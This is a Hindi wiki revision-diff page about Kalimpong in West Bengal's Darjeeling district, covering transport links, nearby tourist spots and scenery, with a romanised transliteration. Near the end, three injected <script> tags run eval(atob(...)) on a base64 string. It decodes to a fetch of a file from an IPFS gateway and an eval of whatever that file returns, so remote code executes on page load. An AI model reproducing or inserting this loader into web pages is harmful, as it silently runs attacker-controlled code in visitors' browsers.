Difference between revisions of "कलिंपोंग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "नजारा" to "नज़ारा")
 
(7 intermediate revisions by 4 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
[[चित्र:Golf-Course-At-Kalimpong.jpg|thumb|250px|गोल्फ़ कोर्स, कलिंपोंग]]
 
[[चित्र:Golf-Course-At-Kalimpong.jpg|thumb|250px|गोल्फ़ कोर्स, कलिंपोंग]]
 
कलिंपोंग [[पश्चिम बंगाल]] के दार्जिलिंग ज़िले में स्थित है। शहर की भीड़भाड़ से दूर रह कर प्रकृति को उस के असली रूप में और बहुत नजदीक से देखना है तो कलिंपोंग से बेहतर और दूसरा स्थान हो ही नहीं सकता। 1,056 वर्ग किलोमीटर में फैले कलिंपोंग की नैसर्गिक ख़ूबसूरती देखते ही बनती है, क्योंकि इस समतल इलाके का बर्फीला एकांत ही इस का वरदान है। समुद्रतट से 1,250 मीटर की ऊँचाई पर स्थित कलिंपोंग की आय का मुख्य साधन [[पर्यटन]], बागबानी व [[कृषि]] है।  
 
कलिंपोंग [[पश्चिम बंगाल]] के दार्जिलिंग ज़िले में स्थित है। शहर की भीड़भाड़ से दूर रह कर प्रकृति को उस के असली रूप में और बहुत नजदीक से देखना है तो कलिंपोंग से बेहतर और दूसरा स्थान हो ही नहीं सकता। 1,056 वर्ग किलोमीटर में फैले कलिंपोंग की नैसर्गिक ख़ूबसूरती देखते ही बनती है, क्योंकि इस समतल इलाके का बर्फीला एकांत ही इस का वरदान है। समुद्रतट से 1,250 मीटर की ऊँचाई पर स्थित कलिंपोंग की आय का मुख्य साधन [[पर्यटन]], बागबानी व [[कृषि]] है।  
 
==यातायात और परिवाहन==
 
==यातायात और परिवाहन==
[[पश्चिम बंगाल]] के [[दार्जिलिंग]] ज़िले के अंतर्गत आने वाले कलिंपोंग का निकटतम हवाई अड्डा बागडोगरा है जो यहाँ से 80 किलोमीटर तथा नजदीकी रेलवे स्टेशन न्यू जलपाईगुड़ी 70 किलोमीटर की दूरी पर है। कलिंपोंग बस मार्ग द्वारा [[कोलकाता]], दार्जिलिंग, [[गंगटोक]] और [[गुवाहाटी]] से जुड़ा है। यहाँ का बस स्टेशन सिलिगुड़ी 65 किलोमीटर दूर है जो राष्ट्रीय राजमार्ग पर है।
+
[[पश्चिम बंगाल]] के [[दार्जिलिंग]] ज़िले के अंतर्गत आने वाले कलिंपोंग का निकटतम हवाई अड्डा बागडोगरा है जो यहाँ से 80 किलोमीटर तथा नजदीकी रेलवे स्टेशन न्यू [[जलपाईगुड़ी]] 70 किलोमीटर की दूरी पर है। कलिंपोंग बस मार्ग द्वारा [[कोलकाता]], [[दार्जिलिंग]], [[गंगटोक]] और [[गुवाहाटी]] से जुड़ा है। यहाँ का बस स्टेशन [[सिलिगुड़ी]] 65 किलोमीटर दूर है जो राष्ट्रीय राजमार्ग पर है।
 +
 
 
== पर्यटन स्थल==
 
== पर्यटन स्थल==
 
डेलो, दुर्पीन, रेलीपाला, लोलेगाँव, कफेर, लाभा आदि पर्यटन स्थलों की हरीभरी वादियों को देख कर लगता है कि इन्हें प्रकृति ने फुरसत से तलाशा व तराशा है।
 
डेलो, दुर्पीन, रेलीपाला, लोलेगाँव, कफेर, लाभा आदि पर्यटन स्थलों की हरीभरी वादियों को देख कर लगता है कि इन्हें प्रकृति ने फुरसत से तलाशा व तराशा है।
 
[[चित्र:Kalimpong.jpg|thumb|250px|left|कलिंपोंग का एक दृश्य]]
 
[[चित्र:Kalimpong.jpg|thumb|250px|left|कलिंपोंग का एक दृश्य]]
डेलो कलिंपोंग नगर से 5 किलोमीटर दुर्पीन 4 किलोमीटर, रेलीपाला 20 किलोमीटर की दूरी पर हैं। लोलेगाँव 20 किलोमीटर तथा कफेर 25 किलोमीटर की दूरी पर स्थित है। भागदौड़ भरी जिंदगी के व्यस्त कार्यक्रमों से कुछ आरामदायक दिन गुजारने के लिए देशी-विदेशी सैलानी कलिंपोंग की प्राकृतिक छटा से भरपूर स्थलों की ओर रुख करते हैं। कफेर से दिखाई देने वाला सूर्योदय का मनोरम दृश्य यहाँ आने वाले सैलानियों की पहली पसंद है। हजारों विदेशी सैलानी सिर्फ सूर्योदय ही देखने के लिए ही यहाँ आते हैं।
+
डेलो कलिंपोंग नगर से 5 किलोमीटर दुर्पीन 4 किलोमीटर, रेलीपाला 20 किलोमीटर की दूरी पर हैं। लोलेगाँव 20 किलोमीटर तथा कफेर 25 किलोमीटर की दूरी पर स्थित है। भागदौड़ भरी ज़िंदगी के व्यस्त कार्यक्रमों से कुछ आरामदायक दिन गुजारने के लिए देशी-विदेशी सैलानी कलिंपोंग की प्राकृतिक छटा से भरपूर स्थलों की ओर रुख़ करते हैं। कफेर से दिखाई देने वाला सूर्योदय का मनोरम दृश्य यहाँ आने वाले सैलानियों की पहली पसंद है। हजारों विदेशी सैलानी सिर्फ सूर्योदय ही देखने के लिए ही यहाँ आते हैं।
 
   
 
   
 
हवाओं के मंद झोंकों के साथ अठखेलियाँ करने वाले टीक के ऊँचे-ऊँचे दरख्त, हर रुकावटों से जूझती हुई यहाँ बहने वाली पहाड़ी नदियाँ, सड़कों के दोनों किनारों पर रहोडोडैंड्रन डून, मैग्नोलिया, मैरीगोल्ड और और्किड के [[फूल|फूलों]] को देख कर लगता वादियों को कुदरत ने फूलों का हार पहना रखा है।
 
हवाओं के मंद झोंकों के साथ अठखेलियाँ करने वाले टीक के ऊँचे-ऊँचे दरख्त, हर रुकावटों से जूझती हुई यहाँ बहने वाली पहाड़ी नदियाँ, सड़कों के दोनों किनारों पर रहोडोडैंड्रन डून, मैग्नोलिया, मैरीगोल्ड और और्किड के [[फूल|फूलों]] को देख कर लगता वादियों को कुदरत ने फूलों का हार पहना रखा है।
  
मात्र कुछ किलोमीटर दूरी पर स्थित [[कंचनजंघा]] का ख़ूबसूरत नजारा तो इन वादियों की ख़ूबसूरती में चार चाँद लगा देता है। बागबानी में विश्वविख्यात हालैंड का सानी रखने वाले कलिंपोंग का तापमान गरमी के मौसम में अधिकतम 27 डिग्री सैल्सियस तक रहता है। यहाँ के पर्यटक स्थालों पर ज्यादातर [[नेपाल|नेपाली]] व [[भूटान|भूटिया]] लोग रहते हैं जिन की मेहमाननवाजी को देख कर कोई भी पर्यटक प्रभावित हुए बगैर नहीं रह सकता। [[पर्वत]], शिखर व घाटी से सुसज्जित यहाँ के पर्यटन स्थलों की भौगोलिक बनावट दर्शनीय भी है तो दिलचस्प भी। जनसमुदाय में व्याप्त सादगी एवं अनेकता में एकता की भावना यहाँ हर तरफ देखने को मिलती है।
+
मात्र कुछ किलोमीटर दूरी पर स्थित [[कंचनजंघा]] का ख़ूबसूरत नज़ारा तो इन वादियों की ख़ूबसूरती में चार चाँद लगा देता है। बागबानी में विश्वविख्यात हालैंड का सानी रखने वाले कलिंपोंग का तापमान गरमी के मौसम में अधिकतम 27 डिग्री सैल्सियस तक रहता है। यहाँ के पर्यटक स्थालों पर ज़्यादातर [[नेपाल|नेपाली]] व [[भूटान|भूटिया]] लोग रहते हैं जिन की मेहमाननवाजी को देख कर कोई भी पर्यटक प्रभावित हुए बगैर नहीं रह सकता। [[पर्वत]], शिखर व घाटी से सुसज्जित यहाँ के पर्यटन स्थलों की भौगोलिक बनावट दर्शनीय भी है तो दिलचस्प भी। जनसमुदाय में व्याप्त सादगी एवं अनेकता में एकता की भावना यहाँ हर तरफ देखने को मिलती है।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 20: Line 20:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{पहाड़ी पर्यटन स्थल}}
 
{{पश्चिम बंगाल के नगर}}
 
{{पश्चिम बंगाल के नगर}}
 
{{पश्चिम बंगाल के पर्यटन स्थल}}
 
{{पश्चिम बंगाल के पर्यटन स्थल}}
[[Category:नया पन्ना]]
 
 
[[Category:पश्चिम_बंगाल]][[Category:पश्चिम_बंगाल_के_पर्यटन_स्थल]][[Category:पश्चिम बंगाल के नगर]][[Category:भारत के नगर]][[Category:पर्यटन_कोश]]
 
[[Category:पश्चिम_बंगाल]][[Category:पश्चिम_बंगाल_के_पर्यटन_स्थल]][[Category:पश्चिम बंगाल के नगर]][[Category:भारत के नगर]][[Category:पर्यटन_कोश]]
 +
[[Category:पहाड़ी पर्यटन स्थल]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 14:36, 31 July 2014

thumb|250px|golf kors, kalianpoang kalianpoang pashchim bangal ke darjiliang zile mean sthit hai. shahar ki bhi dabha d se door rah kar prakriti ko us ke asali roop mean aur bahut najadik se dekhana hai to kalianpoang se behatar aur doosara sthan ho hi nahian sakata. 1,056 varg kilomitar mean phaile kalianpoang ki naisargik khoobasoorati dekhate hi banati hai, kyoanki is samatal ilake ka barphila ekaant hi is ka varadan hai. samudratat se 1,250 mitar ki ooanchaee par sthit kalianpoang ki ay ka mukhy sadhan paryatan, bagabani v krishi hai.

yatayat aur parivahan

pashchim bangal ke darjiliang zile ke aantargat ane vale kalianpoang ka nikatatam havaee adda bagadogara hai jo yahaan se 80 kilomitar tatha najadiki relave steshan nyoo jalapaeegu di 70 kilomitar ki doori par hai. kalianpoang bas marg dvara kolakata, darjiliang, gangatok aur guvahati se ju da hai. yahaan ka bas steshan siligu di 65 kilomitar door hai jo rashtriy rajamarg par hai.

paryatan sthal

delo, durpin, relipala, lolegaanv, kapher, labha adi paryatan sthaloan ki haribhari vadiyoan ko dekh kar lagata hai ki inhean prakriti ne phurasat se talasha v tarasha hai. thumb|250px|left|kalianpoang ka ek drishy delo kalianpoang nagar se 5 kilomitar durpin 4 kilomitar, relipala 20 kilomitar ki doori par haian. lolegaanv 20 kilomitar tatha kapher 25 kilomitar ki doori par sthit hai. bhagadau d bhari ziandagi ke vyast karyakramoan se kuchh aramadayak din gujarane ke lie deshi-videshi sailani kalianpoang ki prakritik chhata se bharapoor sthaloan ki or rukh karate haian. kapher se dikhaee dene vala sooryoday ka manoram drishy yahaan ane vale sailaniyoan ki pahali pasand hai. hajaroan videshi sailani sirph sooryoday hi dekhane ke lie hi yahaan ate haian.

havaoan ke mand jhoankoan ke sath athakheliyaan karane vale tik ke ooanche-ooanche darakht, har rukavatoan se joojhati huee yahaan bahane vali paha di nadiyaan, s dakoan ke donoan kinaroan par rahododaiandran doon, maignoliya, mairigold aur aurkid ke phooloan ko dekh kar lagata vadiyoan ko kudarat ne phooloan ka har pahana rakha hai.

matr kuchh kilomitar doori par sthit kanchanajangha ka khoobasoorat nazara to in vadiyoan ki khoobasoorati mean char chaand laga deta hai. bagabani mean vishvavikhyat halaiand ka sani rakhane vale kalianpoang ka tapaman garami ke mausam mean adhikatam 27 digri sailsiyas tak rahata hai. yahaan ke paryatak sthaloan par zyadatar nepali v bhootiya log rahate haian jin ki mehamananavaji ko dekh kar koee bhi paryatak prabhavit hue bagair nahian rah sakata. parvat, shikhar v ghati se susajjit yahaan ke paryatan sthaloan ki bhaugolik banavat darshaniy bhi hai to dilachasp bhi. janasamuday mean vyapt sadagi evan anekata mean ekata ki bhavana yahaan har taraph dekhane ko milati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>